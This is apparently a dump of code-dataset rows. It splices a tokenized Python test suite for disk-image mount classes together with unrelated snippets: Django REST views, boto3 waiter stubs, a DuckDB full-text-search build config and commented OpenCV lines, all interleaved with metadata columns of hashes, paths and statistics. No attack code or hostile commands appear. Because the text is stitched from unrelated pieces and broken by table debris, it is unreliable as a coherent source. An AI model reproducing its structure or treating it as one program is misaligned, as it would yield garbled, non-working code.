op|'='
name|'self'
op|'.'
name|'_test_map_dev_with_trycmd'
op|'('
name|'PARTITION'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|','
name|'AUTOMAP_PARTITION'
op|']'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'""'
op|','
name|'mount'
op|'.'
name|'error'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_automap
name|'def'
name|'test_map_dev_automap'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'True'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev'
op|'('
name|'PARTITION'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
nl|'\n'
op|'['
name|'ORIG_DEVICE'
op|','
name|'AUTOMAP_PARTITION'
op|','
name|'AUTOMAP_PARTITION'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'AUTOMAP_PARTITION'
op|','
name|'mount'
op|'.'
name|'mapped_device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'automapped'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_else
name|'def'
name|'test_map_dev_else'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'True'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev'
op|'('
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'ORIG_DEVICE'
op|','
name|'mount'
op|'.'
name|'mapped_device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mount'
op|'.'
name|'automapped'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_format_raw
dedent|''
name|'def'
name|'test_instance_for_format_raw'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'imgmodel'
op|'.'
name|'LocalFileImage'
op|'('
string|'"/some/file.raw"'
op|','
nl|'\n'
name|'imgmodel'
op|'.'
name|'FORMAT_RAW'
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_format'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'loop'
op|'.'
name|'LoopMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_format_qcow2
dedent|''
name|'def'
name|'test_instance_for_format_qcow2'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'imgmodel'
op|'.'
name|'LocalFileImage'
op|'('
string|'"/some/file.qcows"'
op|','
nl|'\n'
name|'imgmodel'
op|'.'
name|'FORMAT_QCOW2'
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_format'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'nbd'
op|'.'
name|'NbdMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_format_block
dedent|''
name|'def'
name|'test_instance_for_format_block'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'imgmodel'
op|'.'
name|'LocalBlockImage'
op|'('
nl|'\n'
string|'"/dev/mapper/instances--instance-0000001_disk"'
op|','
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_format'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'block'
op|'.'
name|'BlockMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_loop
dedent|''
name|'def'
name|'test_instance_for_device_loop'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/loop0'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'loop'
op|'.'
name|'LoopMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_loop_partition
dedent|''
name|'def'
name|'test_instance_for_device_loop_partition'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/mapper/loop0p1'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'loop'
op|'.'
name|'LoopMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_nbd
dedent|''
name|'def'
name|'test_instance_for_device_nbd'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/nbd0'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'nbd'
op|'.'
name|'NbdMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_nbd_partition
dedent|''
name|'def'
name|'test_instance_for_device_nbd_partition'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/mapper/nbd0p1'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'nbd'
op|'.'
name|'NbdMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_block
dedent|''
name|'def'
name|'test_instance_for_device_block'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/mapper/instances--instance-0000001_disk'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'block'
op|'.'
name|'BlockMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_block_partiton
dedent|''
name|'def'
name|'test_instance_for_device_block_partiton'
op|'('
name|'self'
op|','
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/mapper/instances--instance-0000001_diskp1'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'block'
op|'.'
name|'BlockMount'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.459424
| 88
| 0.6081
| 2,821
| 19,038
| 3.999646
| 0.069833
| 0.183462
| 0.091288
| 0.070726
| 0.851458
| 0.826642
| 0.782771
| 0.752016
| 0.711956
| 0.67615
| 0
| 0.003619
| 0.100116
| 19,038
| 1,527
| 89
| 12.467584
| 0.654973
| 0
| 0
| 0.937132
| 0
| 0
| 0.355605
| 0.033092
| 0
| 0
| 0
| 0
| 0.017027
| 0
| null | null | 0.00131
| 0.004584
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f3a58ab1e1c766015be409c5fa0e14d65d1b6b40
| 155
|
py
|
Python
|
mrcp/turnouts/__init__.py
|
danielvilas/mrcp
|
8b79c2487ec8acf6678113772e70a32e2ab24d72
|
[
"MIT"
] | null | null | null |
mrcp/turnouts/__init__.py
|
danielvilas/mrcp
|
8b79c2487ec8acf6678113772e70a32e2ab24d72
|
[
"MIT"
] | null | null | null |
mrcp/turnouts/__init__.py
|
danielvilas/mrcp
|
8b79c2487ec8acf6678113772e70a32e2ab24d72
|
[
"MIT"
] | null | null | null |
from mrcp.turnouts.halfturnout import *
from mrcp.turnouts.ladderstep import *
from mrcp.turnouts.turnout import *
from mrcp.turnouts.curveturnout import *
| 38.75
| 40
| 0.825806
| 20
| 155
| 6.4
| 0.4
| 0.25
| 0.5
| 0.515625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 155
| 4
| 40
| 38.75
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
34051130b8046d64465b728ddb382eaaa1f7bc7d
| 47
|
py
|
Python
|
metrics/__init__.py
|
zhongerqiandan/OpenDialog
|
f478b2a912c8c742da5ced510ac40da59217ddb3
|
[
"MIT"
] | 98
|
2020-07-16T06:27:29.000Z
|
2022-03-12T15:21:51.000Z
|
metrics/__init__.py
|
zhongerqiandan/OpenDialog
|
f478b2a912c8c742da5ced510ac40da59217ddb3
|
[
"MIT"
] | 2
|
2020-07-22T12:00:17.000Z
|
2021-02-24T01:19:14.000Z
|
metrics/__init__.py
|
gmftbyGMFTBY/OpenDialog
|
8eb56b7a21cea1172131db7a56d2656364144771
|
[
"MIT"
] | 19
|
2020-07-16T08:36:09.000Z
|
2021-09-14T05:36:54.000Z
|
from .metric import *
from .ir_metric import *
| 15.666667
| 24
| 0.744681
| 7
| 47
| 4.857143
| 0.571429
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 47
| 2
| 25
| 23.5
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
347060ba1e8ef3b500c329d2c68922d1d57c96c0
| 4,785
|
py
|
Python
|
api/views.py
|
rauanisanfelice/django-api-ecommerce
|
3b8c0db70841eb9bd0fb5e115b266e4c9d80751a
|
[
"MIT"
] | null | null | null |
api/views.py
|
rauanisanfelice/django-api-ecommerce
|
3b8c0db70841eb9bd0fb5e115b266e4c9d80751a
|
[
"MIT"
] | null | null | null |
api/views.py
|
rauanisanfelice/django-api-ecommerce
|
3b8c0db70841eb9bd0fb5e115b266e4c9d80751a
|
[
"MIT"
] | null | null | null |
import logging
from django.contrib.auth.models import User
from rest_framework import mixins, generics, permissions, viewsets
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.schemas.openapi import AutoSchema
from .models import Produto, Categoria
from .serializers import ProdutoSerializer, CategoriaSerializer, UserSerializer
logger = logging.getLogger(__name__)
class UserList(generics.ListAPIView):
"""Lista todos usuários."""
schema = AutoSchema(tags=["Usuários"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = User.objects.all()
serializer_class = UserSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"UserList {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
class UserDetail(generics.RetrieveAPIView):
"""Detalhes do usuário."""
schema = AutoSchema(tags=["Usuários"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = User.objects.all()
serializer_class = UserSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"UserDetail {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
class ProdutoList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):
"""Lista todos produtos, ou cria um novo produto."""
schema = AutoSchema(tags=["Produtos"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = Produto.objects.all()
serializer_class = ProdutoSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"ProdutoList {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class ProdutoDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):
schema = AutoSchema(tags=["Produtos"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = Produto.objects.all()
serializer_class = ProdutoSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"ProdutoDetail {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
class CategoriaList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):
"""Lista todas categorias, ou cria uma nova categoria."""
schema = AutoSchema(tags=["Categorias"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = Categoria.objects.all()
serializer_class = CategoriaSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"CategoriaList {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class CategoriaDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):
schema = AutoSchema(tags=["Categorias"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = Categoria.objects.all()
serializer_class = CategoriaSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"CategoriaDetail {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
| 34.927007
| 125
| 0.71348
| 472
| 4,785
| 7.177966
| 0.188559
| 0.103896
| 0.160567
| 0.099174
| 0.792208
| 0.792208
| 0.792208
| 0.751476
| 0.751476
| 0.751476
| 0
| 0
| 0.163636
| 4,785
| 137
| 126
| 34.927007
| 0.846577
| 0.029467
| 0
| 0.746988
| 0
| 0
| 0.08218
| 0.032439
| 0
| 0
| 0
| 0.007299
| 0
| 1
| 0.192771
| false
| 0
| 0.096386
| 0.120482
| 0.915663
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
348289331a6d2754e19c39e370ac6704cc3f22da
| 1,532
|
py
|
Python
|
boto3_type_annotations/boto3_type_annotations/dms/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations/boto3_type_annotations/dms/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations/boto3_type_annotations/dms/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Dict
from typing import List
from botocore.waiter import Waiter
class EndpointDeleted(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WaiterConfig: Dict = None):
pass
class ReplicationInstanceAvailable(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WaiterConfig: Dict = None):
pass
class ReplicationInstanceDeleted(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WaiterConfig: Dict = None):
pass
class ReplicationTaskDeleted(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None, WaiterConfig: Dict = None):
pass
class ReplicationTaskReady(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None, WaiterConfig: Dict = None):
pass
class ReplicationTaskRunning(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None, WaiterConfig: Dict = None):
pass
class ReplicationTaskStopped(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None, WaiterConfig: Dict = None):
pass
class TestConnectionSucceeds(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WaiterConfig: Dict = None):
pass
| 34.818182
| 142
| 0.696475
| 177
| 1,532
| 6.028249
| 0.163842
| 0.067479
| 0.09747
| 0.12746
| 0.763824
| 0.763824
| 0.763824
| 0.763824
| 0.763824
| 0.763824
| 0
| 0
| 0.201044
| 1,532
| 43
| 143
| 35.627907
| 0.871732
| 0
| 0
| 0.592593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.296296
| false
| 0.296296
| 0.111111
| 0
| 0.703704
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
1b4648f902c46b3ba37b17ac5dd30692120bf247
| 119
|
py
|
Python
|
habari/settings/local.py
|
ppolle/habari
|
671b98c361ce593f708bc15f69dd3aa6fe72b128
|
[
"MIT"
] | 3
|
2020-06-08T08:39:06.000Z
|
2020-07-30T10:46:22.000Z
|
habari/settings/local.py
|
ppolle/habari
|
671b98c361ce593f708bc15f69dd3aa6fe72b128
|
[
"MIT"
] | 9
|
2021-03-19T11:18:58.000Z
|
2022-02-10T15:48:35.000Z
|
habari/settings/local.py
|
ppolle/habari
|
671b98c361ce593f708bc15f69dd3aa6fe72b128
|
[
"MIT"
] | 1
|
2021-09-22T07:23:03.000Z
|
2021-09-22T07:23:03.000Z
|
import sys
if 'test' in sys.argv:
from habari.settings.test import *
else:
from habari.settings.dev import *
| 17
| 38
| 0.697479
| 18
| 119
| 4.611111
| 0.611111
| 0.240964
| 0.433735
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210084
| 119
| 6
| 39
| 19.833333
| 0.882979
| 0
| 0
| 0
| 0
| 0
| 0.033613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1b522424b865fc9db3867c58abc3c0d93bfaf58d
| 2,171
|
py
|
Python
|
extension/fts/fts_config.py
|
AldoMyrtaj/duckdb
|
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
|
[
"MIT"
] | 2,816
|
2018-06-26T18:52:52.000Z
|
2021-04-06T10:39:15.000Z
|
extension/fts/fts_config.py
|
AldoMyrtaj/duckdb
|
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
|
[
"MIT"
] | 1,310
|
2021-04-06T16:04:52.000Z
|
2022-03-31T13:52:53.000Z
|
extension/fts/fts_config.py
|
AldoMyrtaj/duckdb
|
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
|
[
"MIT"
] | 270
|
2021-04-09T06:18:28.000Z
|
2022-03-31T11:55:37.000Z
|
import os
# list all include directories
include_directories = [os.path.sep.join(x.split('/')) for x in ['extension/fts/include', 'third_party/snowball/libstemmer', 'third_party/snowball/runtime', 'third_party/snowball/src_c']]
# source files
source_files = [os.path.sep.join(x.split('/')) for x in ['extension/fts/fts-extension.cpp', 'extension/fts/fts_indexing.cpp']]
# snowball
source_files += [os.path.sep.join(x.split('/')) for x in ['third_party/snowball/libstemmer/libstemmer.cpp', 'third_party/snowball/runtime/utilities.cpp', 'third_party/snowball/runtime/api.cpp', 'third_party/snowball/src_c/stem_UTF_8_arabic.cpp', 'third_party/snowball/src_c/stem_UTF_8_basque.cpp', 'third_party/snowball/src_c/stem_UTF_8_catalan.cpp', 'third_party/snowball/src_c/stem_UTF_8_danish.cpp', 'third_party/snowball/src_c/stem_UTF_8_dutch.cpp', 'third_party/snowball/src_c/stem_UTF_8_english.cpp', 'third_party/snowball/src_c/stem_UTF_8_finnish.cpp', 'third_party/snowball/src_c/stem_UTF_8_french.cpp', 'third_party/snowball/src_c/stem_UTF_8_german.cpp', 'third_party/snowball/src_c/stem_UTF_8_german2.cpp', 'third_party/snowball/src_c/stem_UTF_8_greek.cpp', 'third_party/snowball/src_c/stem_UTF_8_hindi.cpp', 'third_party/snowball/src_c/stem_UTF_8_hungarian.cpp', 'third_party/snowball/src_c/stem_UTF_8_indonesian.cpp', 'third_party/snowball/src_c/stem_UTF_8_irish.cpp', 'third_party/snowball/src_c/stem_UTF_8_italian.cpp', 'third_party/snowball/src_c/stem_UTF_8_kraaij_pohlmann.cpp', 'third_party/snowball/src_c/stem_UTF_8_lithuanian.cpp', 'third_party/snowball/src_c/stem_UTF_8_lovins.cpp', 'third_party/snowball/src_c/stem_UTF_8_nepali.cpp', 'third_party/snowball/src_c/stem_UTF_8_norwegian.cpp', 'third_party/snowball/src_c/stem_UTF_8_porter.cpp', 'third_party/snowball/src_c/stem_UTF_8_portuguese.cpp', 'third_party/snowball/src_c/stem_UTF_8_romanian.cpp', 'third_party/snowball/src_c/stem_UTF_8_russian.cpp', 'third_party/snowball/src_c/stem_UTF_8_serbian.cpp', 'third_party/snowball/src_c/stem_UTF_8_spanish.cpp', 'third_party/snowball/src_c/stem_UTF_8_swedish.cpp', 'third_party/snowball/src_c/stem_UTF_8_tamil.cpp', 'third_party/snowball/src_c/stem_UTF_8_turkish.cpp']]
| 241.222222
| 1,788
| 0.823584
| 387
| 2,171
| 4.20155
| 0.160207
| 0.221402
| 0.398524
| 0.413284
| 0.731242
| 0.683272
| 0.683272
| 0.683272
| 0.683272
| 0.074416
| 0
| 0.014755
| 0.032243
| 2,171
| 8
| 1,789
| 271.375
| 0.759162
| 0.023031
| 0
| 0
| 0
| 0
| 0.835539
| 0.834121
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
59fdc1f49c3c899a2657021f7d372b450f5a78a2
| 5,325
|
py
|
Python
|
utils/Type of preprocessing.py
|
sixduck/Sorting-robot-using-Opencv-Tensorflow-Arduino
|
54f58d8899b3c29dcb12eb4843f3418d36824c8a
|
[
"MIT"
] | null | null | null |
utils/Type of preprocessing.py
|
sixduck/Sorting-robot-using-Opencv-Tensorflow-Arduino
|
54f58d8899b3c29dcb12eb4843f3418d36824c8a
|
[
"MIT"
] | null | null | null |
utils/Type of preprocessing.py
|
sixduck/Sorting-robot-using-Opencv-Tensorflow-Arduino
|
54f58d8899b3c29dcb12eb4843f3418d36824c8a
|
[
"MIT"
] | null | null | null |
x=1
y=2
z=3
# # 1s or less
# diff_low_t=35
# diff_high_t=255
# target_gray = cv2.cvtColor(anh_phat_hien_crop, cv2.COLOR_BGR2GRAY)
# self.previewImage('a', target_gray)
# bg_gray = cv2.cvtColor(anh_nen_crop, cv2.COLOR_BGR2GRAY)
# self.previewImage('a', bg_gray)
# diff_gray = cv2.absdiff(target_gray,bg_gray)
# self.previewImage('a', diff_gray)
# diff_gray_blur = cv2.GaussianBlur(diff_gray,(5,5),0)
# self.previewImage('a', diff_gray_blur)
